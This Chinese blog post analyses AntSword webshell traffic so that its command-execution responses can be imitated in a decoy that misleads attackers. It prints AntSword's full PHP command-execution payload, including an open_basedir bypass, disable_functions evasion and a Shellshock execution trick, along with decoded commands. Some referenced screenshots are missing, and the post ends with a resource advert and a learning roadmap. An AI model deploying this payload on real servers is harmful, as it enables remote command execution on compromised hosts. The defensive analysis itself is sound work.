蚁剑的分析和利用

程序员小肖

已于 2024-01-19 10:17:06 修改

阅读量358

点赞数

文章标签： servlet java dreamweaver

于 2023-02-19 12:35:22 首次发布

本文链接：https://blog.csdn.net/qq_53058639/article/details/129109418

版权

前言

这篇文章主要是以虚拟终端模块执行命令功能为例，逐步分析，并通过分析结果优化对应脚本的方法。

前情回顾

已经解决了初步认证的问题

经分析，通过连通密钥首即可通过蚁剑的认证，达到连接成功的目的，但是连接成功后会出现这种情况。

所以我进行初步猜测，虚拟终端初始化没有问题，执行命令出现问题，所以我最开始的分析就先从执行命令功能开始进行。

【一>所有资源获取<一】 1、200份很多已经买不到的绝版电子书 2、30G安全大厂内部的视频资料 3、100份src文档 4、常见安全面试题 5、ctf大赛经典题目解析 6、全套工具包

一、流量分析

首先我们抓一个虚拟终端的执行命令请求包进行初步的分析，之后我们将数据流进行URL解码。

PS：为了大家方便查看，我将请求格式化后贴在了下面。

f72002fb14c8e8 = SEY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1cveWpmeiImd2hvYW1pJmVjaG8gOGIyMjZlNDQmY2QmZWNobyA5ZGI3Zjg4Yzg3 & lefdf77c8e3d95 = yBY21k & pota123 = @ini_set("display_errors", "0");@
set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {$oparr = preg_split("/\\\\|\//", $opdir);$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);$tmdir = ".5062e111e";@mkdir($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");for ($i = 0; $i < sizeof($oparr); $i++) {@chdir("..");}@ini_set("open_basedir", "/");@rmdir($ocwd."/".$tmdir);
};

function asenc($out) {return $out;
};

function asoutput() {$output = ob_get_contents();ob_end_clean();echo "6d29"."1125";echo@ asenc($output);echo "699"."aa2b";
}
ob_start();
try {$p = base64_decode(substr($_POST["lefdf77c8e3d95"], 2));$s = base64_decode(substr($_POST["f72002fb14c8e8"], 2));$envstr = @base64_decode(substr($_POST["w641c9ee55f10c"], 2));$d = dirname($_SERVER["SCRIPT_FILENAME"]);$c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"" : "/c \"{$s}\"";if (substr($d, 0, 1) == "/") {@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");} else {@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");} if (!empty($envstr)) {$envarr = explode("|||asline|||", $envstr);foreach($envarr as $v) {if (!empty($v)) {@putenv(str_replace("|||askey|||", "=", $v));}}}$r = "{$p} {$c}";function fe($f) {$d = explode(",", @ini_get("disable_functions"));if (empty($d)) {$d = array();} else {$d = array_map('trim', array_map('strtolower', $d));}return (function_exists($f) && is_callable($f) && !in_array($f, $d));};function runshellshock($d, $c) {if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {if (strstr(readlink("/bin/sh"), "bash") != FALSE) {$tmp = tempnam(sys_get_temp_dir(), 'as');putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (fe('error_log')) {error_log("a", 1);} else {mail("a@127.0.0.1", "", "", "-bv");}} else {return False;}$output = @file_get_contents($tmp);@unlink($tmp);if ($output != "") {print($output);return True;}}return False;};function runcmd($c) {$ret = 0;$d = dirname($_SERVER["SCRIPT_FILENAME"]);if (fe('system')) {@system($c, $ret);}elseif(fe('passthru')) {@passthru($c, $ret);}elseif(fe('shell_exec')) {print(@shell_exec($c));}elseif(fe('exec')) {@exec($c, $o, $ret);print(join("
", $o));}elseif(fe('popen')) {$fp = @popen($c, 'r');while (!@feof($fp)) {print(@fgets($fp, 2048));}@pclose($fp);}elseif(fe('proc_open')) {$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);while (!@feof($io[1])) {print(@fgets($io[1], 2048));}while (!@feof($io[2])) {print(@fgets($io[2], 2048));}@fclose($io[1]);@fclose($io[2]);@proc_close($p);}elseif(fe('antsystem')) {@antsystem($c);}elseif(runshellshock($d, $c)) {return $ret;}elseif(substr($d, 0, 1) != "/" && @class_exists("COM")) {$w = new COM('WScript.shell');$e = $w - > exec($c);$so = $e - > StdOut();$ret. = $so - > ReadAll();$se = $e - > StdErr();$ret. = $se - > ReadAll();print($ret);} else {$ret = 127;}return $ret;};$ret = @runcmd($r." 2>&1");print($ret != 0) ? "ret={$ret}" : "";;
} catch (Exception $e) {echo "ERROR://".$e - > getMessage();
};
asoutput();
die(); & w641c9ee55f10c = Ut

通过数据包的请求和响应我们取出最关键的两处。

通过初步分析我们得知一个信息，请求内容的核心代码位置存在关键的变量引用，这点开始引起了我的重视。（最后分析过全部功能后，把这块弄明白可以解决全部功能的问题）

PS：执行命令流量包的特征我就不写了，可以自行去分析流量包寻找特征。

二、代码分析

通过流量分析我们得到了一处变量串，并且得知解码方式，我们写个函数先给内容解密一下看看。

f72002fb14c8e8=SEY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1cveWpmeiImd2hvYW1pJmVjaG8gOGIyMjZlNDQmY2QmZWNobyA5ZGI3Zjg4Yzg3&lefdf77c8e3d95=yBY21k&pota123=@ini_set("display_errors", "0")

我们解密后得知变量的内容为到这里，我们已经获取了执行命令的唯一特征。（PS：这里我们可以直接通过对base64编码的方式来确定命令内容，具体细节就不多说了懂的都懂。）

cd /d "C:/phpstudy_pro/WWW/yjfz"&whoami&echo 8b226e44&cd&echo 9db7f88c87

我们现在已经可以确定命令特征了，通过流量分析得到的特征，稍作修改我们就可以实现虚拟终端的全部功能了。但是我们还有一个关键问题没有解决，”返回连接那里执行命令返回一次内容后，路径发生变化导致后续命令执行失败“

三、整合分析

这块其实卡了很久，一直想为什么，按理来说，认证通过了命令也能成功解析应该是不会出现这个问题才对的，难道说请求包里有内容在控制路径？或者说这块的信息是当前路径？带着这种思路我打开了蚁剑的源码开始分析。

终于我找到了命令执行这块的核心代码，如下图。

我们可以看到这个就是我们代码分析处得到命令执行内容。我们关联一下两者之间的关系。

`cd "${path}";${cmd};echo [S];(pwd).path;echo [E]` :
 `cd /d "${path}"&${cmd}&echo [S]&cd&echo [E]` :
 `cd "${path}";${cmd};echo [S];pwd;echo [E]`);

cd /d "C:/phpstudy_pro/WWW/yjfz"&whoami&echo 8b226e44&cd&echo 9db7f88c87

我们很容易就可以看出来 8b226e44 9db7f88c87就是对应的[S] [E]，可是[S][E]是什么东西呢，难道是认证么，我们回过头来去分析流量包。

OK，问题解决了，也就是说我们接受到数据后，只返回了第一步认证（这里我叫做连通性密钥），而我们没有通过第二步认证（[S]当前路径[E]），所以我们的蚁剑就只获取到了win-raf7i2l9ph1\potato这一个有效数据，自然而然在当前路径处渲染了win-raf7i2l9ph1\potato的内容了。所以我们命令执行只需要构造这样一个请求包

四、实现效果

最后只需要编写对应的脚本，这里我提醒一下大家，执行命令的数据包有两种特征。

后语

思路篇写的太急了，今天抽时间写了分析篇，主要拿命令执行这块来举例，其他功能虽然和命令执行特征不完全一样，但是也都是这个思路。这个手法我觉得最重要的是怎么让攻击者按照你的思路来走，一步一步降低他的防备心，最后落入你的反（PIAN）制 (JU) 当中去。

网络安全入门学习路线

其实入门网络安全要学的东西不算多，也就是网络基础+操作系统+中间件+数据库，四个流程下来就差不多了。

1.网络安全法和了解电脑基础

其中包括操作系统Windows基础和Linux基础，标记语言HTML基础和代码JS基础，以及网络基础、数据库基础和虚拟机使用等...

别被这些看上去很多的东西给吓到了，其实都是很简单的基础知识，同学们看完基本上都能掌握。计算机专业的同学都应该接触了解过，这部分可以直接略过。没学过的同学也不要慌，可以去B站搜索相关视频，你搜关键词网络安全工程师会出现很多相关的视频教程，我粗略的看了一下，排名第一的视频就讲的很详细。当然你也可以看下面这个视频教程仅展示部分截图：学到http和https抓包后能读懂它在说什么就行。